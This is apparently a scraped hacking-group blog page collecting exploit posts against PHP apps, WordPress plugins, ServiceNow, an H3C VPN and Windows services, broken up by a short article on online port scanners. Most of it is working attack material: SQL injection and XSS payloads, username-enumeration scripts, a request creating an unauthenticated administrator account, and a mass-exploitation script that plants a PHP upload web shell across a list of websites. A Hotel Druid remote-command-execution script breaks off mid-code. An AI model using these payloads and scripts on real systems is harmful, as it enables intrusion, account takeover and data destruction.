# Exploit Title: Multi-Vendor Online Groceries Management System 1.0 - 'id' Blind SQL Injection
# Date: 11/02/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15166/multi-vendor-online-groceries-management-system-phpoop-free-source-code.html
# Version: 1.0
# Tested on: XAMPP, Windows 10
# Vulnerable Code
line 2 in file "mvogms/products/view_product.php
$qry = $conn->query("SELECT p.*, v.shop_name as vendor, c.name as `category` FROM `product_list` p inner join vendor_list v on p.vendor_id = v.id inner join category_list c on p.category_id = c.id where p.delete_flag = 0 and p.id = '{$_GET['id']}'");
# Sqlmap command:
sqlmap -u 'localhost/mvogms/?page=products/view_product&id=3' -p id --level=5 --risk=3 --dbs --random-agent --eta --batch
# Output:
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: page=products/view_product&id=3' AND 9973=9973-- ogag
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=products/view_product&id=3' AND (SELECT 2002 FROM (SELECT(SLEEP(5)))anjK)-- glsQ
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863125436
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: Simple Student Quarterly Result/Grade System 1.0 - SQLi Authentication Bypass
# Date: 11/02/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15169/simple-student-quarterly-resultgrade-system-php-and-mysql-free-source-code.html
# Version: 1.0
# Tested on: XAMPP, Linux
# Vulnerable Code
line 57 in file "/sqgs/Actions.php"
@$check= $this->db->query("SELECT count(admin_id) as `count` FROM admin_list where `username` = '{$username}' ".($id > 0 ? " and admin_id != '{$id}' " : ""))->fetch_array()['count'];
Steps To Reproduce:
* - Go to the login page http://localhost/sqgs/login.php
Payload:
username: admin ' or '1'='1'#--
password: \
Proof of Concept :
POST /sqgs/Actions.php?a=login HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 51
Origin: http://localhost
Connection: close
Referer: http://localhost/sqgs/login.php
Cookie: PHPSESSID=v9a2mv23kc0gcj43kf6jeudk2v
username=admin+'+or+'1'%3D'1'%23--&password=0xsaudi
# Exploit Title: ServiceNow - Username Enumeration
# Google Dork: NA
# Date: 12 February 2022
# Exploit Author: Victor Hanna (Trustwave SpiderLabs)
# Author Github Page: https://9lyph.github.io/CVE-2021-45901/
# Vendor Homepage: https://www.servicenow.com/
# Software Link: https://docs.servicenow.com/bundle/orlando-servicenow-platform/page/product/mid-server/task/t_DownloadMIDServerFiles.html
# Version: Orlando
# Tested on: MAC OSX
# CVE : CVE-2021-45901
#!/usr/local/bin/python3
# Author: Victor Hanna (SpiderLabs)
# User enumeration script SNOW
# Requires valid 1. JSESSION (anonymous), 2. X-UserToken and 3. CSRF Token
import requests
import re
import urllib.parse
from colorama import init
from colorama import Fore, Back, Style
import sys
import os
import time
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
def banner():
print ("[+]********************************************************************************[+]")
print ("| Author : Victor Hanna (9lyph)["+Fore.RED + "SpiderLabs" +Style.RESET_ALL+"]\t\t\t\t\t |")
print ("| Decription: SNOW Username Enumerator |")
print ("| Usage : "+sys.argv[0]+" |")
print ("| Prequisite: \'users.txt\' needs to contain list of users |")
print ("[+]********************************************************************************[+]")
def main():
os.system('clear')
banner()
proxies = {
"http":"http://127.0.0.1:8080/",
"https":"http://127.0.0.1:8080/"
}
url = "http://<redacted>/"
try:
# s = requests.Session()
# s.verify = False
r = requests.get(url, timeout=10, verify=False, proxies=proxies)
JSESSIONID = r.cookies["JSESSIONID"]
glide_user_route = r.cookies["glide_user_route"]
startTime = (str(time.time_ns()))
# print (startTime[:-6])
except requests.exceptions.Timeout:
print ("[!] Connection to host timed out !")
sys.exit(1)
except requests.exceptions.ProxyError:
print ("[!] Can't communicate with proxy !")
sys.exit(1)
with open ("users.txt", "r") as f:
usernames = f.readlines()
print (f"[+] Brute forcing ....")
for users in usernames:
url = "http://<redacted>/$pwd_reset.do?sysparm_url=ss_default"
headers1 = {
"Host": "<redacted>",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0",
"Accept": "*/*",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Connection": "close",
"Cookie": "glide_user_route="+glide_user_route+"; JSESSIONID="+JSESSIONID+"; __CJ_g_startTime=\'"+startTime[:-6]+"\'"
}
try:
# s = requests.Session()
# s.verify = False
r = requests.get(url, headers=headers1, timeout=20, verify=False, proxies=proxies)
obj1 = re.findall(r"pwd_csrf_token", r.text)
obj2 = re.findall(r"fireAll\(\"ck_updated\"", r.text)
tokenIndex = (r.text.index(obj1[0]))
startTime2 = (str(time.time_ns()))
# userTokenIndex = (r.text.index(obj2[0]))
# userToken = (r.text[userTokenIndex+23 : userTokenIndex+95])
token = (r.text[tokenIndex+45:tokenIndex+73])
url = "http://<redacted>/xmlhttp.do"
headers2 = {
"Host": "<redacted>",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0",
"Accept": "*/*",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Referer": "http://<redacted>/$pwd_reset.do?sysparm_url=ss default",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"Content-Length": "786",
"Origin": "http://<redacted>/",
"Connection": "keep-alive",
# "X-UserToken":""+userToken+"",
"Cookie": "glide_user_route="+glide_user_route+";JSESSIONID="+JSESSIONID+"; __CJ_g_startTime=\'"+startTime2[:-6]+"\'"
}
data = {
"sysparm_processor": "PwdAjaxVerifyIdentity",
"sysparm_scope": "global",
"sysparm_want_session_messages": "true",
"sysparm_name":"verifyIdentity",
"sysparm_process_id":"c6b0c20667100200a5a0f3b457415ad5",
"sysparm_processor_id_0":"fb9b36b3bf220100710071a7bf07390b",
"sysparm_user_id_0":""+users.strip()+"",
"sysparm_identification_number":"1",
"sysparam_pwd_csrf_token":""+token+"",
"ni.nolog.x_referer":"ignore",
"x_referer":"$pwd_reset.do?sysparm_url=ss_default"
}
payload_str = urllib.parse.urlencode(data, safe=":+")
except requests.exceptions.Timeout:
print ("[!] Connection to host timed out !")
sys.exit(1)
try:
# s = requests.Session()
# s.verify = False
time.sleep(2)
r = requests.post(url, headers=headers2, data=payload_str, timeout=20, verify=False, proxies=proxies)
if "500" in r.text:
print (Fore.RED + f"[-] Invalid user: {users.strip()}" + Style.RESET_ALL)
f = open("enumeratedUserList.txt", "a+")
f.write(Fore.RED + f"[-] Invalid user: {users.strip()}\n" + Style.RESET_ALL)
f.close()
elif "200" in r.text:
print (Fore.GREEN + f"[+] Valid user: {users.strip()}" + Style.RESET_ALL)
f = open("enumeratedUserList.txt", "a+")
f.write(Fore.GREEN + f"[+] Valid user: {users.strip()}\n" + Style.RESET_ALL)
f.close()
else:
print (Fore.RED + f"[-] Invalid user: {users.strip()}" + Style.RESET_ALL)
f = open("enumeratedUserList.txt", "a+")
f.write(Fore.RED + f"[-] Invalid user: {users.strip()}\n" + Style.RESET_ALL)
f.close()
except KeyboardInterrupt:
sys.exit()
except requests.exceptions.Timeout:
print ("[!] Connection to host timed out !")
sys.exit(1)
except Exception as e:
print (Fore.RED + f"Unable to connect to host" + Style.RESET_ALL)
if __name__ == "__main__":
main ()
# Exploit Title: H3C SSL VPN - Username Enumeration
# Exploit Author: LiquidWorm
H3C SSL VPN Username Enumeration
Vendor: Hangzhou H3C Technologies Co. | New H3C Technologies Co., Ltd.
Product web page: https://www.h3c.com
Affected version: n/a
Summary: H3C SSL VPN is a secure VPN system based on SSL connections. It allows mobile employees
to access corporate networks remotely in an easy and secure way. The H3C SSL VPN devices are a
new generation of professional SSL VPN devices for enterprises. They can function as ingress
gateways as well as proxy gateways of internal server clusters. The SecPath SSL VPN devices are
for small-to medium-sized enterprises, while the SecBlade SSL VPN devices are for medium-sized
enterprises.
Desc: The weakness is caused due to the login script and how it verifies provided credentials. An
attacker can use this weakness to enumerate valid users on the affected application via 'txtUsrName'
POST parameter.
Tested on: ssl vpn gateway HttpServer 1.1
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5697
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5697.php
24.01.2022
--
Non-valid:
----------
POST https://10.0.0.5/svpn/vpnuser/login_submit.cgi
txtMacAddr=000000000000&svpnlang=en&selIdentity=1&txtUsrName=root&txtPassword=123456&selDomain=1&authmethod=1&vldCode=
<tr><td align="center">User is not exist</TD></TR>
Valid:
------
POST https://10.0.0.5/svpn/vpnuser/login_submit.cgi
txtMacAddr=000000000000&svpnlang=en&selIdentity=1&txtUsrName=administrator&txtPassword=123456&selDomain=1&authmethod=1&vldCode=
<tr><td align="center">Input password incorrect</TD></TR>
Valid:
------
POST https://10.0.0.5/svpn/vpnuser/login_submit.cgi
txtMacAddr=000000000000&svpnlang=en&selIdentity=1&txtUsrName=guest&txtPassword=123456&selDomain=1&authmethod=1&vldCode=
<tr><td align="center">Local user state is inactive</TD></TR>
# Exploit Title: TeamSpeak 3.5.6 - Insecure File Permissions
# Date: 2022-02-15
# Exploit Author: Aryan Chehreghani
# Contact: aryanchehreghani@yahoo.com
# Vendor Homepage: https://www.teamspeak.com
# Software Link: https://www.teamspeak.com/en/downloads
# Version: 3.5.6
# Tested on: Windows 10 x64
# [ About - TeamSpeak ]:
#TeamSpeak (TS) is a proprietary voice-over-Internet Protocol (VoIP),
#application for audio communication between users on a chat channel,
#much like a telephone conference call, Users typically use headphones with a microphone,
#The client software connects to a TeamSpeak server of the user's choice from which the user may join chat channels,
#The target audience for TeamSpeak is gamers, who can use the software to communicate,
#with other players on the same team of a multiplayer video game,
#Communicating by voice gives a competitive advantage by enabling players to keep their hands on the controls.
# [ Description ]:
#The TeamSpeak Application was installed with insecure file permissions.
#It was found that all folder and file permissions were incorrectly configured during installation.
#It was possible to replace the service binary.
# [ POC ]:
C:\Users\user\AppData\Local\TeamSpeak 3 Client>icacls *.exe
createfileassoc.exe NT AUTHORITY\SYSTEM:(F)
BUILTIN\Administrators:(F)
WIN-FREMP1UB3LB\Administrator:(F)
error_report.exe NT AUTHORITY\SYSTEM:(F)
BUILTIN\Administrators:(F)
WIN-FREMP1UB3LB\Administrator:(F)
package_inst.exe NT AUTHORITY\SYSTEM:(F)
BUILTIN\Administrators:(F)
WIN-FREMP1UB3LB\Administrator:(F)
QtWebEngineProcess.exe NT AUTHORITY\SYSTEM:(F)
BUILTIN\Administrators:(F)
WIN-FREMP1UB3LB\Administrator:(F)
ts3client_win32.exe NT AUTHORITY\SYSTEM:(F)
BUILTIN\Administrators:(F)
WIN-FREMP1UB3LB\Administrator:(F)
Uninstall.exe NT AUTHORITY\SYSTEM:(F)
BUILTIN\Administrators:(F)
WIN-FREMP1UB3LB\Administrator:(F)
update.exe NT AUTHORITY\SYSTEM:(F)
BUILTIN\Administrators:(F)
WIN-FREMP1UB3LB\Administrator:(F)
Successfully processed 7 files; Failed processing 0 files
# [ Exploit - Privilege Escalation ]:
#Replace ts3client_win32.exe,update.exe,package_inst.exe,QtWebEngineProcess.exe,createfileassoc.exe and other ...
#with any executable malicious file you want then wait and get SYSTEM or Administrator rights (Privilege Escalation)
# Exploit Title: Network Video Recorder NVR304-16EP - Reflected Cross-Site Scripting (XSS) (Unauthenticated)
# Author: Luis Martinez
# Discovery Date: 2022-02-13
# Vendor Homepage: https://www.uniview.com/Products/NVR/Easy/NVR304-S-P/#~Product%20features
# Datasheet of NVR304-S-P: https://www.uniview.com/download.do?id=1819568
# Tested Version: NVR304-16EP
# Tested on: Windows 10 Pro 21H2 x64 es - Firefox 91.6.0esr
# Vulnerability Type: Reflected Cross-Site Scripting (XSS)
# CVE: N/A
# Proof of Concept:
http://IP/LAPI/V1.0/System/Security/Login/"><script>alert('XSS')</script>
When we occasionally become interested in scanning an IP, or want to conceal scanning IP, have we ever thought of alternatives to nmap? Today, this article will recommend 5 excellent websites. For use!
The disadvantage of using Nmap to scan online is that it is not possible to run Nmap scripts easily like using Nmap from the terminal. However, most current Nmap online scanning schemes usually perform scans on the most popular ports.
01 IPV6Scanner
As the name implies, IPV6Scanner.com is a network scanner that allows any user to perform port scanning for any hostname, IPV4 or IPv6-based address.
Its simple interface requires you to fill in the target and click Scan to perform a default scan on the most common server ports.
02 Nmap.online
Nmap online It is probably the most classic alternative solution for Nmap-looking. Web-based applications, not applications running on the terminal.
It provides a simple interface to scan any domain or IP address, and you can choose the type of scan you want to perform, such as fast scan, port scan, operating system detection, or tracking routing.
After the scan is complete, you will get Nmap scan results that display the open, filtered, and closed ports in the same way as traditional Nmap, as shown below
Scan results are as follows
Scan Type Description: Quick Scan This is probably the most commonly used option because it allows you to scan the first 100 most common ports Port Scans let you perform TCP scans on ports 21, 22, 25, 80, 110, 143, 443, and 445 and enable service detection, so you can get data about running services remotely OS detection allows you to detect operating systems running on remote hosts.
03 Shodan
Shodan is a search engine focusing on indexing data from any connected device, such as computers, servers, mobile phones, desks, webcams, smart TVs, refrigerators, smart kitchens, medical devices, traffic lights, and other IoT devices.
Scan results 
As shown above, it can accurately obtain the target open port and corresponding port information. In addition to port information, you also get detailed information about the IP, such as the country, organization, ISP, last update date, associated hostname, ASN, and running web technologies found on that IP, and more.
04 ZoomEye
Developed by Chinese cybersecurity company Knowsec Inc. ZoomEye is an IoT search engine designed to become a search engine in cyberspace. Like Shodan, ZoomEye also provides data about port scans.
Scan the following exposed port 22 as well as the operating system, tags and geolocation, and listen for the software version of the port, as well as friendly port statistics.
Of course, ZoomEye also supports more advanced syntax, so let’s give a brief example below.
Command description example space representation or operation logic service:'ssh' service:'http' search for data of ssh or http protocol + then the operation device:'router'+after:'2020-01-01' search for data of 2020-01-01-01-01-designated router data-represented non-operation country:'CN'-subdivisions:'beijing' search for data in China except Beijing country:'CN' search for country assets. You can use the national abbreviation, or you can use the full name of China/English name such as country:'China' country:'china'ip:'8.8.8'Search IP's C-segment asset cidr:52.2.254.36/16 is IP's B-segment asset cidr:52.2.254.36/8 is IP's A-segment asset port:80 is currently not supported to open multi-port targets at the same time. Other examples can be found on the official website.
05 SurfaceBrowser
SurfaceBrowser™ is a complete Internet surface analyzer that gives you access to a complete data security platform that includes current and historical DNS records, complete IP blocks, SSL certificates, managed domains, associated domains, complete subdomains lists, user agent information for each IP, and of course open ports and running services.
# Exploit Title: WordPress Plugin Error Log Viewer 1.1.1 - Arbitrary File Clearing (Authenticated)
# Date: 09-11-2021
# Exploit Author: Ceylan Bozogullarindan
# Exploit Website: https://bozogullarindan.com
# Vendor Homepage: https://bestwebsoft.com/
# Software Link: https://bestwebsoft.com/products/wordpress/plugins/error-log-viewer/
# Version: 1.1.1
# Tested on: Linux
# CVE: CVE-2021-24966 (https://wpscan.com/vulnerability/166a4f88-4f0c-4bf4-b624-5e6a02e21fa0)
# Description:
Error Log Viewer is a simple utility plugin that helps to find and view log files with errors right from the WordPress admin dashboard. Get access to all log files from one place. View the latest activity, select logs by date, view a full log file or clear a log file!
I've especially emphasized "clearing a log file" statement because the feature of "clearing a log file" can be used to delete an arbitrary file in a Wordpress web site. The reason of the vulnerability is that, the value of a file path which is going to be deleted is not properly and sufficiently controlled. Name of the parameter leading to the vulnerability is "rrrlgvwr_clear_file_name". It can be manipulated only authenticated users.
An attacker can use this vulnerability; to destroy the web site by deleting wp-config.php file, or to cover the fingerprints by clearing related log files.
# Steps To Reproduce
1. Install and activate the plugin.
2. Click the "Log Monitor" available under Error Log Viewer menu item.
3. Choose a log file to clear.
4. Intercept the request via Burp or any other local proxy tool.
5. Replace the value of the parameter "rrrlgvwr_clear_file_name" with a file path which is going to be cleared, such as /var/www/html/wp-config.php.
6. Check the content of the cleared file. You will see that the file is empty.
# PoC - Supported Materials
---------------------------------------------------------------------------
POST /wp-admin/admin.php?page=rrrlgvwr-monitor.php HTTP/1.1
Host: 127.0.0.1:8000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 603
Connection: close
Upgrade-Insecure-Requests: 1
Cookie: [admin+]
rrrlgvwr_select_log=%2Fvar%2Fwww%2Fhtml%2Fwp-content%2Fplugins%2Flearnpress%2Finc%2Fgateways%2Fpaypal%2Fpaypal-ipn%2Fipn_errors.log&rrrlgvwr_lines_count=10&rrrlgvwr_from=&rrrlgvwr_to=&rrrlgvwr_show_content=all&rrrlgvwr_newcontent=%5B05-Feb-2015+07%3A28%3A49+UTC%5D+Invalid+HTTP+request+method.%0D%0A%0D%0A++++++++++++++++++++++++&rrrlgvwr_clear_file=Clear+log+file&rrrlgvwr_clear_file_name=/var/www/html/wp-config.php&rrrlgvwr_nonce_name=1283d54cc5&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Drrrlgvwr-monitor.php
---------------------------------------------------------------------------
# Exploit Title: Emerson PAC Machine Edition 9.80 Build 8695 - 'TrapiServer' Unquoted Service Path
# Discovery by: Luis Martinez
# Discovery Date: 2022-02-13
# Vendor Homepage: https://www.emerson.com/en-us
# Software Link : https://www.opertek.com/descargar-software/?prc=_326
# Tested Version: 9.80 Build 8695
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es
# Step to discover Unquoted Service Path:
C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "TrapiServer" |findstr /i /v """
Trapi File Server TrapiServer C:\Program Files (x86)\Emerson\PAC Machine Edition\Common\Components\NT\trapiserver.exe Auto
# Service info:
C:\>sc qc TrapiServer
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: TrapiServer
TYPE : 120 WIN32_SHARE_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Emerson\PAC Machine Edition\Common\Components\NT\trapiserver.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Trapi File Server
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
#Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
# Title: WordPress Plugin MasterStudy LMS 2.7.5 - Unauthenticated Admin Account Creation
# Date: 16.02.2022
# Author: Numan Türle
# CVE: CVE-2022-0441
# Software Link: https://wordpress.org/plugins/masterstudy-lms-learning-management-system/
# Version: <2.7.6
# https://www.youtube.com/watch?v=SI_O6CHXMZk
# https://gist.github.com/numanturle/4762b497d3b56f1a399ea69aa02522a6
# https://wpscan.com/vulnerability/173c2efe-ee9c-4539-852f-c242b4f728ed
POST /wp-admin/admin-ajax.php?action=stm_lms_register&nonce=[NONCE] HTTP/1.1
Connection: close
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip, deflate
Accept-Language: tr,en;q=0.9,tr-TR;q=0.8,en-US;q=0.7,el;q=0.6,zh-CN;q=0.5,zh;q=0.4
Content-Type: application/json
Content-Length: 339
{"user_login":"USERNAME","user_email":"EMAIL@TLD","user_password":"PASSWORD","user_password_re":"PASSWORD","become_instructor":"","privacy_policy":true,"degree":"","expertize":"","auditory":"","additional":[],"additional_instructors":[],"profile_default_fields_for_register":{"wp_capabilities":{"value":{"administrator":1}}}}
# Exploit Title: Wondershare Dr.Fone 11.4.9 - 'DFWSIDService' Unquoted Service Path
# Discovery by: Luis Martinez
# Discovery Date: 2022-02-17
# Vendor Homepage: https://www.wondershare.com/
# Software Link : https://download.wondershare.com/drfone_full3360.exe
# Tested Version: 11.4.9
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es
# Step to discover Unquoted Service Path:
C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "DFWSIDService" | findstr /i /v """
Wondershare WSID help DFWSIDService C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\WsidService.exe Auto
# Service info:
C:\>sc qc DFWSIDService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: DFWSIDService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\WsidService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Wondershare WSID help
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
#Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
# Exploit Title: WordPress Plugin dzs-zoomsounds - Remote Code Execution (RCE) (Unauthenticated)
# Google Dork: inurl:wp-content/plugins/dzs-zoomsounds
# Date: 16/02/2022
# Exploit Author: Overthinker1877 (1877 Team)
# Vendor Homepage: https://digitalzoomstudio.net/docs/wpzoomsounds/
# Version: 6.60
# Tested on: Windows / Linux
import os
import requests
import threading
from multiprocessing.dummy import Pool,Lock
from bs4 import BeautifulSoup
import time
import smtplib,sys,ctypes
from random import choice
from colorama import Fore
from colorama import Style
from colorama import init
import re
import time
from time import sleep
init(autoreset=True)
fr = Fore.RED
gr = Fore.BLUE
fc = Fore.CYAN
fw = Fore.WHITE
fy = Fore.YELLOW
fg = Fore.GREEN
sd = Style.DIM
sn = Style.NORMAL
sb = Style.BRIGHT
Bad = 0
Good = 0
def Folder(directory):
if not os.path.exists(directory):
os.makedirs(directory)
Folder("exploited")
def clear():
try:
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
except:
pass
def finder(i) :
global Bad,Good
head = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36'}
try :
x = requests.session()
listaa = ['/wp-content/plugins/dzs-zoomsounds/savepng.php?location=1877.php']
for script in listaa :
url = (i+"/"+script)
while True :
req_first = x.get(url, headers=head)
if "error:http raw post data does not exist" in req_first.text :
burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36", "Accept-Encoding": "gzip, deflate", "Accept": "*/*", "Connection": "close"}
burp0_data = "<?php\r\nerror_reporting(0);\r\necho(base64_decode(\"T3ZlcnRoaW5rZXIxODc3Ijxmb3JtIG1ldGhvZD0nUE9TVCcgZW5jdHlwZT0nbXVsdGlwYXJ0L2Zvcm0tZGF0YSc+PGlucHV0IHR5cGU9J2ZpbGUnbmFtZT0nZicgLz48aW5wdXQgdHlwZT0nc3VibWl0JyB2YWx1ZT0ndXAnIC8+PC9mb3JtPiI=\"));\r\n@copy($_FILES['f']['tmp_name'],$_FILES['f']['name']);\r\necho(\"<a href=\".$_FILES['f']['name'].\">\".$_FILES['f']['name'].\"</a>\");\r\n?>"
requests.post(url, headers=burp0_headers, data=burp0_data,timeout=45)
urlx = (i+"/"+"/wp-content/plugins/dzs-zoomsounds/1877.php")
req_second = x.get(urlx, headers=head)
if "Overthinker1877" in req_second.text :
Good = Good + 1
print(fg+"Exploited "+fw+">> "+fg+" = "+urlx)
with open("exploited/shell.txt","a") as file :
file.write(urlx+"\n")
file.close()
else :
Bad = Bad + 1
print(fc+""+fw+"["+fr+"X"+fw+"] "+fr+" "+i+" "+fw+" <<< "+fr+" Can't Exploit")
else :
Bad = Bad + 1
print(fc+""+fw+"["+fr+"X"+fw+"] "+fr+" "+i+" "+fw+" <<< "+fr+" Not Vuln")
pass
break
except :
pass
if os.name == 'nt':
ctypes.windll.kernel32.SetConsoleTitleW('1877Exploit | Exploited-{} | Not Vuln-{}'.format(Good, Bad))
else :
sys.stdout.write('\x1b]2; 1877Exploit | Exploited-{} | Not Vuln-{}\x07'.format(Good,Bad))
def key_logo():
clear = '\x1b[0m'
colors = [36, 32, 34, 35, 31, 37]
x = ' [ + ] OVERTHINKER1877 EXPLOIT'
for N, line in enumerate(x.split('\n')):
sys.stdout.write('\x1b[1;%dm%s%s\n' % (choice(colors), line, clear))
time.sleep(0.05)
def process(line):
time.sleep(1)
def run() :
key_logo()
clear()
print("""
[-] -----------------------------------------[-]
[+] WwW.1877.TeaM
[-] -----------------------------------------[-]
\n \n""")
file_name = input("Website List : ")
op = open(file_name,'r').read().splitlines()
TEXTList = [list.strip() for list in op]
p = Pool(int(input('Thread : ')))
p.map(finder, TEXTList)
run()
# Exploit Title: Hotel Druid 3.0.3 - Remote Code Execution (RCE)
# Date: 05/01/2022
# Exploit Author: 0z09e (https://twitter.com/0z09e)
# Vendor Homepage: https://www.hoteldruid.com/
# Software Link: https://www.hoteldruid.com/download/hoteldruid_3.0.3.tar.gz
# Version: 3.0.3
# CVE : CVE-2022-22909
#!/usr/bin/python3
import requests
import argparse
def login( target , username = "" , password = "", noauth=False):
login_data = {
"vers_hinc" : "1",
"nome_utente_phpr" : username,
"password_phpr" : password
}
if not noauth:
login_req = requests.post(f"{target}/inizio.php" , data=login_data , verify=False )
if '<a class="nav" id="nb_men" href="./inizio.php?id_sessione=' in login_req.text:
token = login_req.text.split('<a class="nav" id="nb_men" href="./inizio.php?id_sessione=')[1].split('"> <b>')[0]
anno = login_req.text.split('<input type="hidden" name="anno" value="')[1].split('">')[0]
ret_data = {"token" : token , "anno" : anno}
#print("ret data" + ret_data)
return ret_data
else:
return False
else:
login_req = requests.get(f"{target}/inizio.php" , verify=False )
try:
anno = login_req.text.split('<input type="hidden" name="anno" value="')[1].split('">')[0]
token = ""
ret_data = {"token" : token , "anno" : anno}
return ret_data
except:
return False
def check_privilege(target , anno , token=""):
priv_req = requests.get(f"{target}/visualizza_tabelle.php?id_sessione={token}&tipo_tabella=appartamenti" , verify=False)
#print(priv_req.text)
if "Modify" in priv_req.text:
return True
else:
return False
def add_room(target , anno , token=""):
add_room_data = {
"anno": anno,
"id_sessione": token,
"n_app":"{${system($_REQUEST['cmd'])}}",
"crea_app":"SI",
"crea_letti":"",
"n_letti":"",
"tipo_tabella":"appartamenti"
}
add_req = requests.post(f"{target}/visualizza_tabelle.php" , data=add_room_data , verify=False)
#print(add_req.text)
if "has been added" in add_req.text:
return True
else:
return False
def test_code_execution(target):
code_execution_req = requests.get(f"{target}/dati/selectappartamenti.php?cmd=id")
if "uid=" in code_execution_req.text:
return code_execution_req.text.split("\n")[0]
else:
return False
def main():
banner = """\n /$$ /$$ /$$ /$$ /$$$$$$$ /$$ /$$
| $$ | $$ | $$ | $$ | $$__ $$ |__/ | $$
| $$ | $$ /$$$$$$ /$$$$$$ /$$$$$$ | $$ | $$ \ $$ /$$$$$$ /$$ /$$ /$$ /$$$$$$$
| $$$$$$$$ /$$__ $$|_ $$_/ /$$__ $$| $$ | $$ | $$ /$$__ $$| $$ | $$| $$ /$$__ $$
| $$__ $$| $$ \ $$ | $$ | $$$$$$$$| $$ | $$ | $$| $$ \__/| $$ | $$| $$| $$ | $$
| $$ | $$| $$ | $$ | $$ /$$| $$_____/| $$ | $$ | $$| $$ | $$ | $$| $$| $$ | $$
| $$ | $$| $$$$$$/ | $$$$/| $$$$$$$| $$ | $$$$$$$/| $$ | $$$$$$/| $$| $$$$$$$
|__/ |__/ \______/ \___/ \_______/|__/ |_______/ |__/ \______/ |__/ \_______/\n\nExploit By - 0z09e (https://twitter.com/0z09e)\n\n"""
parser = argparse.ArgumentParser()
req_args = parser.add_argument_group('required arguments')
req_args.add_argument("-t" ,"--target" , help="Target URL. Example : http://10.20.30.40/path/to/hoteldruid" , required=True)
req_args.add_argument("-u" , "--username" , help="Username" , required=False)
req_args.add_argument("-p" , "--password" , help="password", required=False)
req_args.add_argument("--noauth" , action="store_true" , default=False , help="If No authentication is required to access the dashboard", required=False)
args = parser.parse_args()
target = args.target
if target[-1] == "/":
target = target[:-1]
noauth = args.noauth
username = args.username
password = args.password
if noauth == False and (username == None or password == None):
print('[-] Please provide the authentication method.' )
quit()
print(banner)
if not noauth:
print(f"[*] Logging in with the credential {username}:{password}")
login_result = login(username = username , password = password , target = target)
if login_result != False:
token = login_result.get('token')
anno = login_result.get('anno')
else:
print("[-] Login failed, Check your credential or check if login is required or not .")
quit()
else:
print('[*] Trying to access the Dashboard.')
login_result = login(username = username , password = password , target = target , noauth=True)
if login_result != False:
token = login_result.get('token')
anno = login_result.get('anno')
else:
print('[-] Unable to access the dashboard, Maybe the dashboard is protected with credential.')
exit()
print("[*] Checking the privilege of the user.")
if check_privilege(target= target , token=token , anno=anno):
print("[+] User has the privilege to add room.")
else:
print("[-] User doesn't have the privilege to add room.")
exit()
print("[*] Adding a new room.")
if add_room(target = target , anno=anno , token=token):
print('[+] Room has been added successfully.')
else:
